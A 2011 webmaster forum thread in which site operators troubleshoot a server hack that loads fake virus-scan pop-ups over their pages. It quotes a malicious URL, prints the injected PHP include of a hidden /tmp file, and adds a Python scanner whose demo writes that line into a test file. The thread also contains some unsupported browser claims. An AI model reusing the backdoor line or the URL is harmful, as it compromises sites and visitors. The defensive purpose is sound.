Old 06-17-2011, 10:16 AM   #1
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
Virus/Hack

Hey guys, dealing with a brutal hack/virus. These guys are smart as it only usually happens 1 time per IP. You could easily have this virus and you would never know it. I discovered it by accident. This is happening on my tubes that are using STP and TP; it is also happening on one of my TGPs using TGPX and A2, so it is likely server based. There appears to be nothing out of the ordinary on my server. We have also locked down the server, only providing access from my IP, but it is still happening.
When it loads you can actually see the gallery or tube start to load, then it takes over. You get pop-ups saying that your computer needs to be scanned for viruses etc. The domain that loads is this one, so I am hoping it looks familiar to someone. I shouldn't have to say this but **DO NOT LOAD THIS IN YOUR BROWSER**
91.226.213.60/1bdeb97e93c47ab826ec1a82c1f427ed63041810d588f02f

This one has me stumped. Any help would be appreciated.
Old 06-17-2011, 10:17 AM   #2
Juicy D. Links
So Fucking Banned
 
Join Date: Apr 2001
Location: N.Y. -Long Island --
Posts: 122,992
in case people don't see it


**DO NOT LOAD THIS IN YOUR BROWSER**
Old 06-17-2011, 10:24 AM   #3
slizard
Registered User
 
Join Date: Jul 2003
Posts: 39
It's not a hack. You probably sell traffic to TH.

Each time someone goes to see TH's support about it, they don't know what we're talking about. Saying they visited the offended sites and they saw nothing.

In other words, they act and play stupid cuz they know what is going on and they do jack shit about it cuz probably they have something to win in all that.

And I'm supposed to believe that they know the difference between a real hit and a bot. LOL
Old 06-17-2011, 10:27 AM   #4
slizard
Registered User
 
Join Date: Jul 2003
Posts: 39
And for those that don't sell any traffic to TH and use free scripts, the skim % to pay for the script goes also to brokers...
Old 06-17-2011, 10:28 AM   #5
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
No, I don't sell traffic and my trade scripts are paid ones so there is no skim there either. Also my tubes and TGPs trade with different sites altogether. This is not only happening on trades, as I can see my gallery or tube start to load in the background then this thing takes over. One time it happened on a gallery that I made myself so I know it is clean.
Boy this one is scary!

Last edited by milo99; 06-17-2011 at 10:30 AM..
Old 06-17-2011, 10:28 AM   #6
spazlabz
Confirmed User
 
Join Date: Jul 2003
Location: Kentucky
Posts: 6,548
Quote:
Originally Posted by Juicy D. Links
in case people don't see it

**DO NOT LOAD THIS IN YOUR BROWSER**
I wonder if I should load that in my browser

Thanks Milo for the heads up
Old 06-17-2011, 10:29 AM   #7
Harmon
( ͡ʘ╭͜ʖ╮͡ʘ)
 
Join Date: Mar 2004
Posts: 20,010
It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

Thanks for the warning Juice
Old 06-17-2011, 10:35 AM   #8
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
Quote:
Originally Posted by Harmon
It's porn industry hackers trying to eliminate the scum tube site operator sheep, so everybody can get back to actually making some serious money.

Thanks for the warning Juice
Easy my friend. This is an 11 year old domain and the TGP and Tube are 100% legal.
Old 06-17-2011, 10:56 AM   #9
Chosen
 
Join Date: Aug 2001
Posts: 63,151
Quote:
Originally Posted by spazlabz
I wonder if I should load that in my browser

Thanks Milo for the heads up
Old 06-17-2011, 11:00 AM   #10
Chosen
 
Join Date: Aug 2001
Posts: 63,151
milo99, what browser are you using?
Old 06-17-2011, 11:05 AM   #11
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
Quote:
Originally Posted by Chosen
milo99, what browser are you using?
I am on a Mac using FF however this also happened to the guy who makes my galleries who is on a PC using Chrome
Old 06-17-2011, 11:52 AM   #12
AdultKing
Raise Your Weapon
 
Join Date: Jun 2003
Location: Outback Australia
Posts: 15,601
It can be really hard to detect changes on a well hacked server, you really need to check everything twice or three times as you move it all to a fresh machine. If it is server based, you could never trust that installation again.

I assume you have run all the rootkit checkers etc. on the system for clues?
Old 06-17-2011, 12:41 PM   #13
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
Yes my host has been running checks since this started but with no luck. Anyone recommend someone who specializes in this kind of thing?
Old 06-17-2011, 01:27 PM   #14
harvey
Confirmed User
 
Join Date: Jul 2001
Location: 127.0.0.1
Posts: 9,266
we cleaned it last week from a client's server but the motherfucker infected my computer and it took me 2 days to clean everything. You probably got it from an image redirect, it's the new trend.

Anyway, it's a very tedious task, but look for each and every strange file in your server. Then open your php and html files and look at the bottom, you'll probably find an image src (or depending on the version, some JS). Delete it.

Now check your site using Chrome or Safari. DO NOT USE IEXPLOITER (why would anyone?) and, sad to say, but DO NOT USE FIREFOX 4! It has a bug that allows images to load as exe.

If it's clean, time to clean your PC. The only antivirus I know of that catches it is ESET NOD, but maybe other antivirus programs have been updated. This is what I did:

1) log in safe mode
2) run SuperAntispyware
3) run ESET NOD (you can run your AV program)
4) checked registry and cleaned a couple entries left

Once you do that and your computer is clean, have your FTP password changed. DO NOT LOGIN TO YOUR SERVER VIA FTP UNTIL YOU DO THIS! Use a very hard to guess key, and if your server allows SFTP, then USE IT!

If everything goes fine, your server and PC will be clean and you're safe to go.

As a general precaution: do not pay attention to "server techs". 90% of them are morons who can't even turn on a computer, much less know about servers. And the chances of you getting one of the remaining 10% are really slim
__________________
This post is endorsed by CIA, KGB, MI6, the Mafia, Illuminati, Kim Jong Il, Worldwide Ninjas Association, Klingon Empire and lolcats. Don't mess around with it, just accept it and embrace the truth
Old 06-28-2011, 09:54 PM   #15
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
I think we found this nasty thing. All of my click.php files for TGPX had this attached to them...

$qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');

This was a server hack. Keep 'em locked up tight!
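An added example, not part of any post in this thread: a Python scanner that walks a web root and reports PHP/HTML files that include a script from a world-writable directory, which is the pattern milo99 found appended to click.php. The directory list, file extensions and function names are assumptions of this example, and the web root it scans is a constructed temporary directory.

```python
import os
import re
import tempfile

# Directories that any local account, including the web server's, can write to.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# include/require with a literal string target, optionally silenced with "@".
INCLUDE_RE = re.compile(
    r"""(@?)\s*\b(include_once|include|require_once|require)\b\s*\(?\s*(['"])(.+?)\3""",
    re.IGNORECASE)

def scan_file(path):
    """Return (line_no, target, reasons) for every include of a writable-dir path."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line_no, line in enumerate(fh, 1):
            for at, _kw, _quote, target in INCLUDE_RE.findall(line):
                if not target.startswith(WRITABLE_DIRS):
                    continue
                reasons = ["writable-dir"] + (["errors-suppressed"] if at else [])
                if any(part.startswith(".") for part in target.split("/")):
                    reasons.append("hidden-path")
                hits.append((line_no, target, reasons))
    return hits

def scan_tree(root, exts=(".php", ".inc", ".html", ".htm")):
    """Walk a web root and map relative file path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = scan_file(full) if name.lower().endswith(exts) else []
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Constructed web root: one clean file, one carrying the line quoted in the thread."""
    injected = "$qall=1;$qscr='click.php';@include_once('/tmp/.ICE-unix/err.tmp');"
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php\nrequire_once('config.php');\necho 'ok';\n")
        with open(os.path.join(root, "click.php"), "w") as fh:
            fh.write("<?php\nheader('Location: /');\n" + injected + "\n")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

It only catches includes whose target is a literal string, so a path built by concatenation or decoding would need a separate check, and any file it names should be compared against a known-good copy of the script.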
Old 06-28-2011, 10:01 PM   #16
Horny Guy
Confirmed User
 
Join Date: Jan 2002
Location: Hervey Bay QLD
Posts: 1,677
check your home router dns settings also and reset the router password ...

they get in to your server using your IP at your home also
__________________
Great hosting and Lots of Ip's
Old 06-28-2011, 10:19 PM   #17
milo99
Registered User
 
Join Date: Aug 2010
Posts: 48
Quote:
Originally Posted by Horny Guy
check your home router dns settings also and reset the router password ...

they get in to your server using your IP at your home also
Thanks Will Do.
Am hoping this was just a permissions thing as the click.php files on other domains that had the correct file permissions appear untouched.
Old 06-29-2011, 01:21 AM   #18
V_RocKs
Damn Right I Kiss Ass!
 
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,409
Hacking is fun
Old 06-29-2011, 12:33 PM   #19
r34lg33k
Registered User
 
Join Date: Jan 2005
Location: Canada, Japan, Philippines
Posts: 29

Need to clear your cookies whichever browser you are using, it's a 1 occurrence a day / IP payload.
We've recently observed these files in TradePulse's /tp/ installation directory as well, easier to spot with ionCube loading in a non-ionCube app. Not likely to come up with search tools, an ionCube encoded payload means scanning it is a bit of a pain. A more permanent solution could be to turn ionCube load off but that's not an option with the fact that you already want to run SmartThumbs/SmartTubes.
__________________
# icq 2.333.686 - www.CheeChTech.com
# Coding: PhP Perl Java JavaScript Flash SOAP C/C++
# SysAdmin: linux & freebsd
Old 06-29-2011, 12:44 PM   #20
seeandsee
Check SIG!
 
Join Date: Mar 2006
Location: Europe (Skype: gojkoas)
Posts: 50,945
just 1 way to find out what is going on, pay some expert!